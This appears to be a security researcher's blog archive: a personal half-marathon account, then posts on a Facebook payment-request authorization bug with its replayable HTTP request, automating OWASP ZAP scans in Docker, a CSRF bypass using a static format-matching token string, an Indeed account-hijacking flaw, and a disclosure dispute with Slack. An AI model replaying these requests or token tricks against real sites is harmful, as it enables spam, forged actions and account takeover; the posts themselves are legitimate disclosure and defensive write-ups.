Skip to content

How I ran my first half marathon!

IMG_3225.JPG

A few months ago, the thought of running even 3 miles seemed very daunting. I have always hated running. There have been times when I have literally forced myself to run just because I wanted to run but I have never gotten myself to enjoy it like many runners do. They call it the Runners high I think? I still don’t know what that is by the way. I would rather play a sport or do some HIIT type of workouts. I love those. I would opt for them any day over running, if given an option. I am a big fan of CrossFit.

Anyways, from what my memory serves, the longest I could run non-stop before I started to train for the SD Half was maybe 5 minutes tops at a speed of 5 on a treadmill. That’s like 0.4 miles or something like that. After that, I would drag myself to reach the 3 mile mark by running/walking in tandem. That was my relationship with running until I decided I am going to run a half marathon NO MATTER WHAT. Half Marathons or any marathon or even 5K for that matter, in general, have been a fleeting idea to me. I have always been so intrigued by seeing people who do it. I always thought maybe some day, I will actually have the courage to do it myself. But, I never took it seriously. It was one of those things that I really wanted to accomplish but I wasn’t really driven towards it. It was, utmost, a dream!

So, after I moved to San Diego, some of my close friends were going to run the SD Half Marathon and they asked me if I was interested as well. I thought this was probably the best opportunity that I will have to train together, run together (not literally but just be there for each other as support) and actually be focussed and dedicated towards something that I have only thought about accomplishing all these years. And, that was it. I didn’t want to let it go.

So, on January 25, I signed up for it and there was no looking back after that. I had roughly 7 weeks to train for it. I found a training schedule online and tried sticking to it as much as I could. It started really slow the first 2 weeks with 2-3 mile runs during the week (walking+running) and the long 5-6 mile runs during the weekends. Not to mention, those long runs were brutal. I hated them to the core. I wanted to give up so bad. It took me forever to get them done. Even after forcing myself to run during the training weeks, I never really enjoyed it. I just pretended to be nonchalant about it to my conscience and went about it. It was a goal that I wanted to complete so I just sucked it in and ran without thinking.

Weeks passed by. I could definitely see a lot of improvement in my stamina. I could run non-stop for much longer distances than I could originally when I first started. One day, I think I was surprised and couldn’t believe myself when I ran 1 mile non-stop and still have some energy in the tank to run some more. That was truly, groundbreaking lol. Seeing the improvement, I kept going on. The shorter runs during the week suddenly started to increase to 3-4 miles and the longer runs kept getting brutal between 7-8 miles. My time per mile started to improve as well. I was really happy and I already felt like I had won a huge battle against my mental block of not being able to run for long distances. The support from friends and the curiosity to know how everyone was doing in their training, their running times, their weekend long runs, etc. was a huge advantage as well to keep myself motivated throughout the 7 weeks.

Fast forward to the D-day, by now, the maximum distance I had run was 9 miles at one go (some walking but mostly running). The longest distance I ran non-stop without walking was about 3.4 miles in 35 mins. That was also my fastest min/mile clocking at an average pace of 10’19” min/mile. So, I could technically run a 5K with ease. The total number of miles I had run since Jan 25 during the training was a staggering 97 miles. That’s almost 14 miles/week and 2 miles/day for 7 weeks. Not bad eh?!

But, not everything goes right all the time now, does it? On the D-day, I started fine. I was clocking at around 12:00 min/mile for the first 7 miles. I even ran the first 5 miles non-stop without stopping which I had not done before even in the training. I was all set to get the 13.1 miles done between 2:35 and 2:45 which was my goal. But, I started cramping really bad around the 8th mile. My right thigh and my left foot arch started hurting every time I landed my foot on the ground. On top of that, the 10th mile was the most difficult part of the course. It was all uphill. Miles 11-13.1 were probably the easiest but by that time, I was hurting so bad I literally couldn’t run or even walk for that matter without limping. So, my pace and timing was all gone by then. I had race guards come up to me twice and make sure I was okay because they saw me struggle towards the final miles. But, I survived somehow. It sucked to the core. The pain in my foot and thigh was excruciating but I managed to get it done finally in 3:10. That was almost 25 mins more than what I originally aimed for.

Needless to say, I am disappointed with the timing. But, I guess there were a few mistakes I did (These are not excuses. I didn’t completely achieve what I set for and I am just making some self points to keep in mind for posterity) and I hope to not repeat them again, incase I decide to run a half again:

  • I did not stretch all my muscles properly before the race.
  • I stopped running outside after the first few weeks of training so the transition from running on a treadmill to outside suddenly was a little off and unexpected.
  • I didn’t run my last long run of 10 miles the weekend before the D-day because I didn’t feel like. The last long run I had run before that was 9 miles the weekend before that. So, basically it had been 2 weeks since I had any long runs so maybe my body wasn’t completely prepared to take the 13.1 miles on the D-day.

So, whats next?! I honestly don’t know. I am going to take some well earned rest and concentrate more on HIIT type workouts. I am still not a big fan of long distance running and if ever I run again, I will only do it because I want to challenge myself.

 

 

Ability to send payment requests inspite of being blocked by the recipient

TL;DR – I, as an attacker could send payment requests to anyone on Facebook even if:

  • I am not a friend of the victim recipient
  • The victim recipient has explicitly blocked me from sending any messages in Facebook Messenger

And, if you are interested in the details, here goes..

Payment requests are normally sent as messages from the Messenger (and can only be sent to a friend) but if you are blocked from sending messages by somebody (whether a friend or not a friend), you can’t technically send payment requests or any messages for that matter from the Facebook Messenger UI.

I observed that this wasn’t completely true. If you could capture a request to send payment requests (to lets say a legit friend who hasn’t blocked you from sending messages), it was possible to just replay that same request using a proxy tool such as Burp (and changing the recipient ID to the victim’s ID or for that matter anyone on Facebook) and it would be sent successfully. Another problem with this was that the victim would receive an email saying that “Attacker has sent you a payment request”. So, this was also abusing the Facebook platform to spam anyone on Facebook and/or carry a spear phishing campaign.

The request looked like below:

POST /p2p/payment_requests/_create/ HTTP/1.1
Host: www.facebook.com
Cookie: c_user=<redacted>; xs=<redacted>;
Connection: close

amount=<amount_requested>&offline_threading_id=<redacted>&requestee_id=<profile_id_who_to_send_to>&__a=1&fb_dtsg=<csrf_token>

Facebook rewarded $1500 for this bug.

 

Running ZAP against an application with proxied test cases inside Docker containers + Reporting in JIRA + Notification in Slack

Building off of my last blog post, I could start two containers – ZAP and the application and then run ZAP against the application and generate a report. However, I observed that this was not getting me good results. Most of the issues reported were missing header issues which weren’t that useful to begin with.

So, I had to figure out a way to make this more meaningful and effective if we were to actively deploy such an automated scanning process in our DevOps pipeline.

The way I figured this would work was to get some legitimate traffic in ZAP before beginning the scan. And, the way we would get any traffic inside ZAP would be to use it as a proxy first before the actual scanning. Now, this would mean that the application would have to be browsed manually in order to generate the data. But, we were trying to automate this entire process so any form of manual intervention was not desired, at least till the point when the reports need to be triaged.

Luckily, we had some custom test cases written in Python and Lua that would generate and send some API requests to the application. So, I had to simply do that first (send the test cases to the application proxying it via ZAP) before beginning my ZAP scan. The results of doing this were slightly better. It also meant it took care of the authentication part because the requests that were sent as a result of running the test cases also contained some headers that were used to authenticate to the application so I didn’t have to change anything specifically within the ZAP API code.

We got a few more issues than just the header stuff so I was happy the approach worked. There is still a lot of work to be done but since the application I am dealing with is not a traditional web application, I am looking at a slightly different route now and maybe do something more than just running the ZAP scan. More on that later as and when I have something to blog about.

A few more things I added to this process were that the reports are now being automatically sent to our JIRA instance and a ticket gets created with the reports as attachments. We also have a webhook for Slack built in so whenever this ticket is created, we get a nice notification in our Slack channel notifying everyone that the scan was run and the report was generated attached to the JIRA ticket for auditing purposes. I also added some exception handling and cleaned the code a little bit.

Overall, the complete automated process looks like:

Screen Shot 2015-08-24 at 8.42.38 PM

zaprun.sh can be found here.

runzap.py can be found here.

jiraconnect.sh can be found here. For this script, you will also need to create a folder called “data” in $pwd and then add 2 files in that directory – credentials.json and data.json. Credentials.json will have your username and password to authenticate to JIRA. It will look something like this:

{

  “username”: “<username>”,

  “password”: “<password>”

}

Data.json will have the ID of your JIRA project, summary, description, issue type and label for the issue that will get created. This information can easily be obtained from your JIRA installation using the REST API browser plugin in JIRA. It will look something like this:

{

    “fields”: {

       “project”:

       {

          “id”: “<id>”

       },

       “summary”: “ZAP Scan Result”,

       “description”: “This issue contains the scan results when ZAP is run against the app”,

       “issuetype”: {

          “id”: “<>”

       },

        “labels”: [

“scan”

]

   }

}

And, that’s it! A fully automated process of running OWASP ZAP in your Devops build pipeline with test cases being proxied via ZAP inside Docker containers and reporting in JIRA with notifications sent to Slack.

Feel free to reach out to me if you have any questions or just to share your experiences if you have been trying to do something similar.

Cheers!!

Automating ZAP running against a web application in Docker Containers

To start of, this has been a lot of fun learning experience for me. It had been a while since I did any sort of Bash/Python scripting so it definitely got me back on track. Also, there are some resources out there but nothing helped me as such for the particular case I was looking to solve. Lastly, I will try to convert this into a series of blog posts where I will try to get much deeper with ZAP scanning and reports, integration with CI build servers, etc. as and when time permits. And, btw, you would need to know the basics of working with Docker in order to understand this blog. Having said that, I will try to explain most of the commands I have in my scripts. So, lets begin.

TL;DR of this post:

1. You install Docker.

2. You run a custom bash script.

3. This bash script starts 2 Docker containers from 2 different images:

  • One is a sample web application. The name of the image from where this container is built is “training/webapp”. This can be found on Docker Hub.
  • The other container is built from a custom image which in turn is built on top of “owasp/zap2docker-stable” image found on Docker Hub.

4. Once, both the containers are started, ZAP runs against the web app. It does a very basic spidering and scanning. Once everything is done, the report is stored on the ZAP container.

5. The report is then transferred onto the host and all the containers are deleted.

So, basically, you ran ZAP against a web app and generated a XML report on your file system – all automated by just one script!

The main bash script (zaprun.sh) mentioned in point 2 above is as follows. I have left comments above each command so it should be self-explanatory. Try to understand this script and save it for now. We will run this later on:

#!/bin/bash

set -e

#Running the sample webapp and storing the ID in a variable

WEBCONTAINERID=$(docker run -d -P –name web training/webapp python app.py)

echo Container ID = $WEBCONTAINERID

#Inspecting the above container to gather its IP address and port that will be accessible to the ZAP container to run the scan against

WEBDOCKERIP=$(docker inspect $WEBCONTAINERID | grep -w IPAddress | sed ‘s/.*IPAddress”: “//’ | sed ‘s/”,$//’)

echo Webapp Docker IP = $WEBDOCKERIP

WEBDOCKERPORT=$(docker port $WEBCONTAINERID | sed ‘s/\/tcp.*//’)

echo Webapp Docker Port = $WEBDOCKERPORT

#Running the ZAP container. Notice that this container is named test and there is a custom python script runzap.py that is run. I will provide these later on. This is what I built on top of owasp/zap2docker-stable image

ZAPCONTAINERID=$(docker run -d –name zap test python /zap/ZAP_2.4.0/runzap.py http://$WEBDOCKERIP:$WEBDOCKERPORT)

echo ZAP Container ID = $ZAPCONTAINERID

#Inspecting the above container to see whether it is running or not. If it is not running, that means ZAP has finished the scan and the report is generated.

STATUS=$(docker inspect $ZAPCONTAINERID | grep Running | sed ‘s/”Running”://’ | sed ‘s/,//’)

flag=”1″

while [ “$flag” = “1” ]; do

if [ $STATUS == “true” ];

then 

sleep 5

echo ZAP is running..

flag=1

STATUS=$(docker inspect $ZAPCONTAINERID | grep Running | sed ‘s/”Running”://’ | sed ‘s/,//’)

else

sleep 5

echo ZAP has stopped

flag=0

STATUS=$(docker inspect $ZAPCONTAINERID | grep Running | sed ‘s/”Running”://’ | sed ‘s/,//’)

fi

done

#Copying the report to Host OS

echo Copying the report to host in the current directory with the name report.xml

docker cp $ZAPCONTAINERID:/zap/ZAP_2.4.0/report.xml .

#Deleting all the containers that were created as a result of this script

echo Deleting the ZAP Container

docker rm $ZAPCONTAINERID

if [ $? -eq 0 ]

then

echo Stopping the Webapp Container

docker stop $WEBCONTAINERID

fi

if [ $? -eq 0 ]

then

echo Deleting the Webapp Container

docker rm $WEBCONTAINERID

fi

Now, on your host OS, create a folder and paste the following 2 files in that folder:

  1. Dockerfile (self-explanatory)

FROM owasp/zap2docker-stable

MAINTAINER Anshuman Bhartiya <anshuman.bhartiya@gmail.com>

RUN apt-get update && apt-get install -y \

python-pip

RUN pip install python-owasp-zap-v2

ADD runzap.py /zap/ZAP_2.4.0/

2. runzap.py (This script is slightly modified from here. Credit also due here.)

#!/usr/bin/env python

import os

import subprocess

import time

import urllib

from pprint import pprint

from zapv2 import ZAPv2

import sys

#Starting ZAP as a daemon on port 8090

print ‘Starting ZAP …’

subprocess.Popen([“zap.sh”,”-daemon”,”-port 8090″,”-host 0.0.0.0″],stdout=open(os.devnull,’w’))

print ‘Waiting for ZAP to load, 10 seconds …’

time.sleep(10)

#Taking the IP address to scan against through the command line. This is where you will provide the value for http://$WEBDOCKERIP:$WEBDOCKERPORT in the above bash script

target = sys.argv[1]

print target

zap = ZAPv2()

print ‘Accessing target %s’ % target

zap.urlopen(target)

time.sleep(2)

#Spidering the target

print ‘Spidering target %s’ % target

zap.spider.scan(target)

time.sleep(2)

while (int(zap.spider.status) < 100):

    print ‘Spider progress %: ‘ + zap.spider.status

    time.sleep(2)

print ‘Spider completed’

time.sleep(5)

#Scanning the target

print ‘Scanning target %s’ % target

zap.ascan.scan(target)

while (int(zap.ascan.status) < 100):

    print ‘Scan progress %: ‘ + zap.ascan.status

    time.sleep(5)

print ‘Scan completed’

#Printing the XMLreport and saving it on the file system of the ZAP container at /zap/ZAP_2.4.0/report.xml which we will later copy to the Host OS

with open(“/zap/ZAP_2.4.0/report.xml”, “w”) as f:

f.write(zap.core.xmlreport)

f.close()

zap.core.shutdown()

That’s all you need pretty much. 3 files –

  1. The main bash script. I have uploaded this here as well.
  2. Dockerfile to build the custom image and container. I have uploaded this here as well.
  3. runzap.py script that is used to start the ZAP daemon and run it against an IP. I have uploaded this here as well.

Once you have all these files, navigate to the folder you created on your host OS and build the Dockerfile with the following command:

docker build -t test .

After this file is built, type:

docker images

you should now see the test image being listed in your repository.

And, to save some time, download the other container as well with the following command:

docker pull training/webapp

In the end, you should see 3 docker images in your repository:

  1. test
  2. owasp/zap2docker-stable
  3. training/webapp

You should be good to go now to run the main bash script. So, just enter:

bash zaprun.sh

Hopefully, everything goes fine and you will see the report.xml file in your current directory.

Cheers!!

A CSRF Protection Bypass Technique

This technique can be used to bypass CSRF protections in some applications by using a static CSRF token (for all users of that application) that looks like a specific format string.

So, to begin with, have you ever noticed CSRF tokens being something like this:

RHAU3cgmTvWy6RWSj+NdJy2v8y8Z0g2U5qTQg4ap/lqeLEfA==

If you have, have you ever looked at it more closely? The above string is basically divided into 3 parts separated by some delimiters. In the above example, the first part “RHAU3cgmTvWy6RWSj” and the second part “NdJy2v8y8Z0g2U5qTQg4ap” are separated by the delimiter “+”. The second part “NdJy2v8y8Z0g2U5qTQg4ap” and the third part “lqeLEfA” are separated by the delimiter “/”. The string finally ends with “==”.

So, considering the above example, if you encounter an application that uses CSRF tokens as shown above, try fiddling with the actual string making sure you keep the format consistent i.e. 3 parts separated by some delimiters and so on and so forth.

In my case, the format ended up being “xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D” which when decoded is “xxxxxxxxxxxxxxxxxxxxxxxxx+xxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw==”

The length of the above string (or the number of x’s) would depend on different applications. So, consider this as just a PoC.

In a nutshell, what I observed was that an attacker can just trick a victim in order to submit a POST request with the above string as the csrf token as a POST parameter and the application server would gladly accept it because it was only looking to ensure the tokens met a specific format and didn’t really compare the actual value received to the value stored on the server side. As a result of this, I was able to bypass CSRF protections throughout the entire application.

———————————————————————

There are some more nuances to the above scenario as well. Consider the case of a double-submit CSRF protection. What that entails is that the CSRF tokens need to be sent in two places – one as a session cookie and one in the POST body. Or, maybe one as a custom header and one in the session cookie. Or, maybe one as a custom header and one in the POST body. There can be multiple possible combinations.

The jist is that they both need to be the same. This is mostly done to prevent the headache of storing the CSRF values on the server side. In such cases, bypassing the protection is not easy because as an attacker, you don’t really have any control over a victim’s browser to be able to set custom headers or session cookies. The most you can do is to trick a victim in order to submit a malicious POST request. But, since the browser sends the headers and/or cookies automatically, the chances of those values matching your value in the POST request are negligible. Hence, the protection, if implemented properly, can be quite effective.

But, when you consider the example discussed above, it was observed that even though the browser was sending a custom header and/or session cookie automagically along with the attacker tricked value “xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D” in the POST body, the server was only looking to ensure that the format matched and not the actual values. So, again, this was a complete CSRF protection bypass because it didn’t matter what CSRF values the browser was sending (as headers and/or cookies) as long as an attacker could trick a victim to submit a POST request with the above static CSRF string.

I am not sure if this technique was already known. If it was, pardon my ignorance. I found this during testing and thought it was pretty interesting hence this post.

Cheers!

Account Hijacking in Indeed

Authenticating to an account on the Indeed iPhone app and then changing the country triggers the user to logout (at least it appears to log out a user). The country changes just fine but instead of the user still being logged in, the “Sign In” option appears in the application. When the user clicks on this “Sign In” option, a set of requests are sent to the server which automatically logs the user back in (obviously because the user never logged out in the first place. The user just changed the country).

Within these URLs that are sent out, there is one particular request that gets sent to the “/account/checklogin” endpoint with the value “passrx” over HTTP. What this means is that a MiTM attacker can easily retrieve this URL over the network.

The attacker can then use the captured URL to take over the victim’s account completely.

It should also be noted that this is not only an account hijacking vulnerability but also a login CSRF vulnerability. An attacker can easily capture the above request for his own account and then trick a victim to login that account.

But, as it is obvious, the more serious vulnerability here is the account hijacking vulnerability by a MiTM attacker.

A PoC video demonstrating the vulnerability is here.

This vulnerability was reported via Bugcrowd to the Indeed bug bounty program and this issue was deemed as a duplicate. I then got explicit permission from the program owners to disclose this publicly.

Cheers!

A little note about Slack’s Bug Bounty program

I reported a bug to Slack via HackerOne on December 13, 2014. Slack closed it as N/A. Considering it was N/A, I went ahead and blogged about it here on December 18, 2014. I gave them a heads up as well on the submission at HackerOne that I will be disclosing it before I actually disclosed it. They kept radio silence so I assumed they didn’t have any issues. They never said not to disclose or anything like that which would make sense because it was marked as N/A meaning they are not interested in the bug in the first place.

Around the same time or rather a day earlier on December 12, 2014, I had reported another bug to Slack via HackerOne. And, they closed it as Duplicate. The entire submission along with the conversations can be found here. In a nutshell, they wanted to do a coordinated disclosure once the issue was fixed. I was perfectly fine with it. I completely understand and respect the ethics of a bug bounty program and I agreed to that. But, after that, there was complete radio silence. I tried following up multiple times but nobody cared to respond or update me regarding the fix as is evident from the document. I also left a comment (1 month and then 4 days before the disclosure) that if I don’t hear back with any update or anything, I would go ahead and disclose it 90 days after the initial submission. According to industry standards, that seems to be the trend these days so I chose to stick with it. I finally disclosed it here on this blog.

On March 12, 2015, I reported yet another bug to Slack, again via the HackerOne platform. This bug was closed today March 16, 2015 as N/A without any explanation or reasoning. The entire conversation along with the bug submission can be found here. Consider this document as a public disclosure for this bug since it is marked and closed as N/A and they don’t seem to be interested in it anyways.

As evident from the latest bug submission document, I have been told that I have “gone against the spirit of a bug bounty program by disclosing things without consent”. They feel that for the second bug described above, “the disclosure is owned by the original reporter.” and, that “By disclosing this without coordinating” I have stolen “the original reporter’s opportunity to disclose a finding.” They have apparently spoken to HackerOne last week and asked to remove me from participating in their bug bounty program. I was apparently supposed to receive some communication regarding this (which btw I never did).

Final Thoughts:

I am honestly very disappointed with how things have been handled. I personally don’t think I did anything against the spirit of a bug bounty program. I am all for coordinated disclosure but if the program owners fail to coordinate or communicate in a timely manner, there is no such thing called coordinated disclosure. Combined with their responses on all my bug submissions and their decision to ban me from participating in their bug bounty program, this is probably the worst experience I have had so far and I feel this is a perfect example of how not to operate a bug bounty program.

I would love to get some feedback and thoughts on this. I am open to criticism and improving anything that I could have done better from my side to make this less painful.